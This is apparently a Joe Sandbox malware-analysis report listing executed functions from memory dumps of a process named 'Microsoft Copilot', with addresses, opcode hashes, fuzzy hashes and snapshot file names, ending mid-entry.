                                                                                      • Opcode ID: 9654b770615c3e1b0b5861514eddfafbe066226475d072da621f4ce624c1736f
                                                                                      • Instruction ID: ae68b0041ac60be72837eff28a3a62c2db7ad5efcff89ccfeb35e15b687af5c3
                                                                                      • Opcode Fuzzy Hash: 9654b770615c3e1b0b5861514eddfafbe066226475d072da621f4ce624c1736f
                                                                                      • Instruction Fuzzy Hash: AC41E3B1B04A2E8FDB45FBB8D8956EDB3A2FF85311F404579D009D32A6DE35A446C780
                                                                                      Function 00007FFAACB50638 Relevance: .1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1fe882d0736ac27763bf805de1d739c8d0c6c2085f50c03a8a07ce6d156c6358
                                                                                      • Instruction ID: dfe323506ce770f2c6824e92fa0adade84776dbf07ba42c3c04e66fdb85ae097
                                                                                      • Opcode Fuzzy Hash: 1fe882d0736ac27763bf805de1d739c8d0c6c2085f50c03a8a07ce6d156c6358
                                                                                      • Instruction Fuzzy Hash: 5F31D361B189494FE698EB3CD45A779B6C6EFD9314F0405BEE04EC3293DE68AC428781
                                                                                      Function 00007FFAACB50D48 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ebd5c277a2d30211b1e9e4a2086833e2145872494de9b4e8eacb3b1186b13e12
                                                                                      • Instruction ID: a4fb949a4d5a97b7527df08e4fc2b7e2e768b96ab374bd97ccd4cbf49c497415
                                                                                      • Opcode Fuzzy Hash: ebd5c277a2d30211b1e9e4a2086833e2145872494de9b4e8eacb3b1186b13e12
                                                                                      • Instruction Fuzzy Hash: 0F2154A1B1491A4FFB85B7BCD45E7BCB2D6EF98711F10417AE50EC32D2DE28A8418391
                                                                                      Function 00007FFAACB5086D Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f02c4c28833a40f37514cc5fdce6c547fc6081709e89da3f07d041e645033c1
                                                                                      • Instruction ID: e5f60194b87ba18e47df7f7292c38da594c9138122641dd2aab7667884f6148d
                                                                                      • Opcode Fuzzy Hash: 2f02c4c28833a40f37514cc5fdce6c547fc6081709e89da3f07d041e645033c1
                                                                                      • Instruction Fuzzy Hash: 86214FB4A1851D8FD789FB28C0959A9BB73AF88304B904568EC09D33AFEF386911C750
                                                                                      Function 00007FFAACB52291 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3051adccd51b0b6760b638ad44add0b0e79a4347161b4b20e855242f0a3d727d
                                                                                      • Instruction ID: 903c3c9c711f992c5445d440cb48bdb39b8772f62ef3579daa1beecab8086337
                                                                                      • Opcode Fuzzy Hash: 3051adccd51b0b6760b638ad44add0b0e79a4347161b4b20e855242f0a3d727d
                                                                                      • Instruction Fuzzy Hash: CF01470880E6A98FF785A33888554317FE1CF96211B0840AFE88DD60A7D94A984883C3

                                                                                      Executed Functions

                                                                                      Function 00007FFAACB216E9 Relevance: .7, Instructions: 699COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e780920924ab9ea93d12690a4275e1660713273fba2fd17a0a7e184706904ab
                                                                                      • Instruction ID: d6ca39799a95062e3c3338ba0b825c1e53a6590d65394ce49cde97c14deb87a2
                                                                                      • Opcode Fuzzy Hash: 2e780920924ab9ea93d12690a4275e1660713273fba2fd17a0a7e184706904ab
                                                                                      • Instruction Fuzzy Hash: ED22B9B0B18A558FE754E738C4597B9B6D2FF99740F404979E40EC32E3EE28AC018781
                                                                                      Function 00007FFAACB20E5E Relevance: .3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b8ffb9d5054d795ec7c5a74c12f236df20e1c1c2dbc7ec5ab8a8ee74980dced5
                                                                                      • Instruction ID: 459b4e2690979a13ea1fa072cac8e142c33646570e4caf51147a3d49e12c3c84
                                                                                      • Opcode Fuzzy Hash: b8ffb9d5054d795ec7c5a74c12f236df20e1c1c2dbc7ec5ab8a8ee74980dced5
                                                                                      • Instruction Fuzzy Hash: 5D7117A2A0D6960FE352B3BDE4595E96B95DF8733470841FBD4CCCA0A3EE085887C395
                                                                                      Function 00007FFAACB220C1 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 64d33a13509368480dce3d588304cbaf681fc3f56c6a2f44eae7a1cf3b5beac5
                                                                                      • Instruction ID: 91fa9ce109d9138c6d899e5bf03a73595b8a04d0f6dec2990b64206f601eb7b5
                                                                                      • Opcode Fuzzy Hash: 64d33a13509368480dce3d588304cbaf681fc3f56c6a2f44eae7a1cf3b5beac5
                                                                                      • Instruction Fuzzy Hash: 54513551A5E6C54FE786A7788824676BFD9DF87225F0804FBE0CDC7193ED18484AC382
                                                                                      Function 00007FFAACB207F2 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;O_$<O_^
                                                                                      • API String ID: 0-3431308889
                                                                                      • Opcode ID: 10b75c5a00f5c37d6d57820211bdc4773841e1e401e213515ae79d33ec58b7ac
                                                                                      • Instruction ID: 7e4f6d28a9386e860406ebd6b79a8eb04a55c2be050669295af7d3c03b4550ad
                                                                                      • Opcode Fuzzy Hash: 10b75c5a00f5c37d6d57820211bdc4773841e1e401e213515ae79d33ec58b7ac
                                                                                      • Instruction Fuzzy Hash: 704115F2A092198FD301E768E0998E97B71FF8531574049BAD54CCB3A3EF286845CB84
                                                                                      Function 00007FFAACB211F2 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2O_^
                                                                                      • API String ID: 0-2974816419
                                                                                      • Opcode ID: 52ae09d3e5482e7817c570e9237a530acbbcf9abddf66d74e89a0b06dfa7f993
                                                                                      • Instruction ID: 9be994bf966d6e399c5aa8ad3d69d97a8d4784f4cf100e85299d854c9d1ffdf2
                                                                                      • Opcode Fuzzy Hash: 52ae09d3e5482e7817c570e9237a530acbbcf9abddf66d74e89a0b06dfa7f993
                                                                                      • Instruction Fuzzy Hash: 4F5138B2D0A6568FE701A7BDE4955EDBF70EF87321B0841B6D08CCA0B3EE14584AC790
                                                                                      Function 00007FFAACB211F0 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2O_^
                                                                                      • API String ID: 0-2974816419
                                                                                      • Opcode ID: 15c035a865810c79662a4c772d36fa4587dc3ae0a9227b3b31f0dd49946e508f
                                                                                      • Instruction ID: 4491541c564b03dd54b0d41a584fcc72617edfcc8c14920c8a349e593fb15c28
                                                                                      • Opcode Fuzzy Hash: 15c035a865810c79662a4c772d36fa4587dc3ae0a9227b3b31f0dd49946e508f
                                                                                      • Instruction Fuzzy Hash: 495118B2D0A6568FE701A7BDE4955ED7F70EF86321B0841B7D14CCA0B3EE14584AC794
                                                                                      Function 00007FFAACB212B8 Relevance: .5, Instructions: 485COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3941b936ed53669c9738635e9717802af6091e99841815e2b15cce49b02e72de
                                                                                      • Instruction ID: 202c204024c740aed379a72d0be1826766a19798f1968091029b97cbec9ad87f
                                                                                      • Opcode Fuzzy Hash: 3941b936ed53669c9738635e9717802af6091e99841815e2b15cce49b02e72de
                                                                                      • Instruction Fuzzy Hash: 71314372A08A4A8FE746D768C8651FDBFB1FF8A200F4401BAC00DD71A3EE249C09C790
                                                                                      Function 00007FFAACB20AFB Relevance: .2, Instructions: 206COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a1c31b6b2e06fe0227f0c8b6515ba68651c8e20cb5ab9e48471feb618ad04967
                                                                                      • Instruction ID: 1c1c35593f9b94cfd1f82ab49cae3465fd01a61723eb55f89335143608842f0b
                                                                                      • Opcode Fuzzy Hash: a1c31b6b2e06fe0227f0c8b6515ba68651c8e20cb5ab9e48471feb618ad04967
                                                                                      • Instruction Fuzzy Hash: 7D51F4B2A0952A8FEB00B7BDE495AEC73A1FF95325B00457AD10CC72A3EF25A445C7D4
                                                                                      Function 00007FFAACB20B6F Relevance: .2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5dc1e8f750b7ca0ff1e78ac15cdb3d1302fc8dd2d12721f63856d3d3ee2fe920
                                                                                      • Instruction ID: f73410b6e2c49962fa6150beea577030e8d1c9e99256d2bb68d81b68c82d8237
                                                                                      • Opcode Fuzzy Hash: 5dc1e8f750b7ca0ff1e78ac15cdb3d1302fc8dd2d12721f63856d3d3ee2fe920
                                                                                      • Instruction Fuzzy Hash: 9241F6B6B0491A8FDB44FBB8E455AED77A1FF98311B40457AD108C7292EF35A846C7C0
                                                                                      Function 00007FFAACB20638 Relevance: .1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35ea04420081bf9253bf73adcbc04f0143ddb6bdcbff9a4d6e03dcd7ae974aaa
                                                                                      • Instruction ID: c9402061b8116966a1214c0f59d4a2aa704cf06c41260331420ab022ad5331fb
                                                                                      • Opcode Fuzzy Hash: 35ea04420081bf9253bf73adcbc04f0143ddb6bdcbff9a4d6e03dcd7ae974aaa
                                                                                      • Instruction Fuzzy Hash: DF31D361B189494FF798EB2CD45AB79B6C6EFD9315F0405BEE04EC3293EE689C418381
                                                                                      Function 00007FFAACB20D48 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7893604306447833401824f3a66cb189d6ab506f1f3776f7aebed840e1441a9d
                                                                                      • Instruction ID: eb7d1702cf566906e9b3958f30e6fe02e0ef0404f7e23b950c74122f32e9ace6
                                                                                      • Opcode Fuzzy Hash: 7893604306447833401824f3a66cb189d6ab506f1f3776f7aebed840e1441a9d
                                                                                      • Instruction Fuzzy Hash: 792166A1B1491A4FFB84B7BCD45E7BCB2D6EF98751F10417AE50DC3292EE28A8418391
                                                                                      Function 00007FFAACB2086D Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 95408c1bd63812d38f8cd5da1505625888abd72c2932619b775ae0bd472abbab
                                                                                      • Instruction ID: 811f0f79357e337b6b48e85593bf52efa4147e6eece9cff965ed203a5f4e8563
                                                                                      • Opcode Fuzzy Hash: 95408c1bd63812d38f8cd5da1505625888abd72c2932619b775ae0bd472abbab
                                                                                      • Instruction Fuzzy Hash: DE21A4F16985194FD745EB28D0959E9BF72FF9C205B805EA8E908C33A7DF346900CB80
                                                                                      Function 00007FFAACB22291 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001D.00000002.2056848584.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_29_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e1c794a04a3b78265b508c903aaa7e34b89bdeef63b84d94cb3148f5026a9d2
                                                                                      • Instruction ID: ea9a524183a6fad2eb5bcd126e1c3c8a01dd80c1750622936267f05c6311de70
                                                                                      • Opcode Fuzzy Hash: 4e1c794a04a3b78265b508c903aaa7e34b89bdeef63b84d94cb3148f5026a9d2
                                                                                      • Instruction Fuzzy Hash: DC01475180EAA14EF745A33898554717FE0DFA6261F0845ABE88CC60A7EC0AA94883C3

                                                                                      Executed Functions

                                                                                      Function 00007FFAACB216E9 Relevance: .7, Instructions: 699COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c36cae931dd2ca3cc8b7026335dad724c05a7ad188a4d150c3ec566b48ff183c
                                                                                      • Instruction ID: 2c95a45dbfb38ad1c59ffab70269137f4c400f1ef130926331150034954e2a79
                                                                                      • Opcode Fuzzy Hash: c36cae931dd2ca3cc8b7026335dad724c05a7ad188a4d150c3ec566b48ff183c
                                                                                      • Instruction Fuzzy Hash: 322295B0B29A598FE794E77CC459679B6D2FF99310F44457DE40EC32A2EE28AC01C781
                                                                                      Function 00007FFAACB20E5E Relevance: .3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35944345f650d9e549a58f39baf293c337cc34c105d8b00d5bbe08c0758bccc9
                                                                                      • Instruction ID: b89d5c014f02c713bfdace6218e5aee4f386da14d609b280ec1cf9d024becc26
                                                                                      • Opcode Fuzzy Hash: 35944345f650d9e549a58f39baf293c337cc34c105d8b00d5bbe08c0758bccc9
                                                                                      • Instruction Fuzzy Hash: C171F7A2A0D6960FE352B3BDE4595F96B95DF8733470841BBD4CCCA0A3EE085887C395
                                                                                      Function 00007FFAACB220C1 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 088e6f6f15305a214b2b16d9c7c71c0b18d938491de38e9e8289ea3bc0ccd46d
                                                                                      • Instruction ID: 907f61813339d00de77ce64fdf3a6397aff6384517cfca93a24406767c917431
                                                                                      • Opcode Fuzzy Hash: 088e6f6f15305a214b2b16d9c7c71c0b18d938491de38e9e8289ea3bc0ccd46d
                                                                                      • Instruction Fuzzy Hash: 6A513551A5E6C54FE786A7788824676BFD9DF87225F0804FBE0CDC7193ED18484AC382
                                                                                      Function 00007FFAACB207F2 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;O_$<O_^
                                                                                      • API String ID: 0-3431308889
                                                                                      • Opcode ID: 553260f351790d72246a971439c41120a328170ba6df7f900bc5d5ce8f898155
                                                                                      • Instruction ID: efb53a754b7a46146f6a5050405e626d342dfd91c6fd0de3e9d1676312016256
                                                                                      • Opcode Fuzzy Hash: 553260f351790d72246a971439c41120a328170ba6df7f900bc5d5ce8f898155
                                                                                      • Instruction Fuzzy Hash: 3A41D6B2A592198FD304E77DE0999E57B71EF8532474444BED44CCF263EF286845C788
                                                                                      Function 00007FFAACB211F2 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2O_^
                                                                                      • API String ID: 0-2974816419
                                                                                      • Opcode ID: 6f17c57f3e9d25ed27790f88cd99d88c320658c7c5a00e2cc03076a03ff5b686
                                                                                      • Instruction ID: 27ca73599ec5572738301c01482c330ab37c519253fdac74e1e901e2ed45d021
                                                                                      • Opcode Fuzzy Hash: 6f17c57f3e9d25ed27790f88cd99d88c320658c7c5a00e2cc03076a03ff5b686
                                                                                      • Instruction Fuzzy Hash: 3A5106B6D0A6568FE701A7BDE4955EDBF70EF86324B0841B6D08CCA0B3EE14584AC794
                                                                                      Function 00007FFAACB211F0 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2O_^
                                                                                      • API String ID: 0-2974816419
                                                                                      • Opcode ID: 1ece58a63114af53c7cd2b5ce5a70d62118d4eca398851a709b31eeee51ad1a0
                                                                                      • Instruction ID: d7815ec5f1732a10b595428760799fe8f4fdbc9b0d4477c4fa3e5566358fe83d
                                                                                      • Opcode Fuzzy Hash: 1ece58a63114af53c7cd2b5ce5a70d62118d4eca398851a709b31eeee51ad1a0
                                                                                      • Instruction Fuzzy Hash: D35108B2D0A6568FE701A7BDE4955ED7F70EF86324B0941B7D04CCA0B3EE14584AC794
                                                                                      Function 00007FFAACB212B8 Relevance: .5, Instructions: 485COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b4c7196c2f8e0c9ca83730b2f8026ecf67e012a146c3fad8afb52fac594297ae
                                                                                      • Instruction ID: 27db14cedf1029051bcf5d59e91303fb1d53aedc2601b0b072f148c65c202bc0
                                                                                      • Opcode Fuzzy Hash: b4c7196c2f8e0c9ca83730b2f8026ecf67e012a146c3fad8afb52fac594297ae
                                                                                      • Instruction Fuzzy Hash: 61312062908A4A8FE745D76CC8651FDBBB1FF8A210F4941BAC00DDB1E2EE249C098790
                                                                                      Function 00007FFAACB20AFB Relevance: .2, Instructions: 206COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bb3d9d4a6ffc073cf0560af0682f519532a9e29928da21cfe2353b248c550419
                                                                                      • Instruction ID: 5c7017db5ea651d0b33a86e0467c38691aed7bebedae4415245fa009349c129f
                                                                                      • Opcode Fuzzy Hash: bb3d9d4a6ffc073cf0560af0682f519532a9e29928da21cfe2353b248c550419
                                                                                      • Instruction Fuzzy Hash: 3451F6B6A0952A8FEB00B7BDE495AEC73A1EF85325B04453AD10CC72A3EF35A445C794
                                                                                      Function 00007FFAACB20B6F Relevance: .2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 36aae5802aad17e9a02c0723c0684d6dcf35450c9de0424e88b729e9b42cccf3
                                                                                      • Instruction ID: a6636640696892b354a9b8e07d39e4727cc3708da56f9fdb08c727e61c3d97e3
                                                                                      • Opcode Fuzzy Hash: 36aae5802aad17e9a02c0723c0684d6dcf35450c9de0424e88b729e9b42cccf3
                                                                                      • Instruction Fuzzy Hash: 5B41E6B6B08A1D8FEB44FBBDD455AED77A1FF84321B40457AD008C7292EE34A446C780
                                                                                      Function 00007FFAACB20638 Relevance: .1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ec05d80c32dc5af4c70696cd0f73bfca66cebc322d53e87e3280c73bad16a277
                                                                                      • Instruction ID: 4c92b25d497e0b87f5d04094f46eedff1bdf89a9dc8366f9879c24b7a1d247d5
                                                                                      • Opcode Fuzzy Hash: ec05d80c32dc5af4c70696cd0f73bfca66cebc322d53e87e3280c73bad16a277
                                                                                      • Instruction Fuzzy Hash: 5431D361B189494FF798EB2CD45AB79B6C6EFD9315F0405BEE04EC3293EE689C418381
                                                                                      Function 00007FFAACB20D48 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7893604306447833401824f3a66cb189d6ab506f1f3776f7aebed840e1441a9d
                                                                                      • Instruction ID: eb7d1702cf566906e9b3958f30e6fe02e0ef0404f7e23b950c74122f32e9ace6
                                                                                      • Opcode Fuzzy Hash: 7893604306447833401824f3a66cb189d6ab506f1f3776f7aebed840e1441a9d
                                                                                      • Instruction Fuzzy Hash: 792166A1B1491A4FFB84B7BCD45E7BCB2D6EF98751F10417AE50DC3292EE28A8418391
                                                                                      Function 00007FFAACB2086D Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
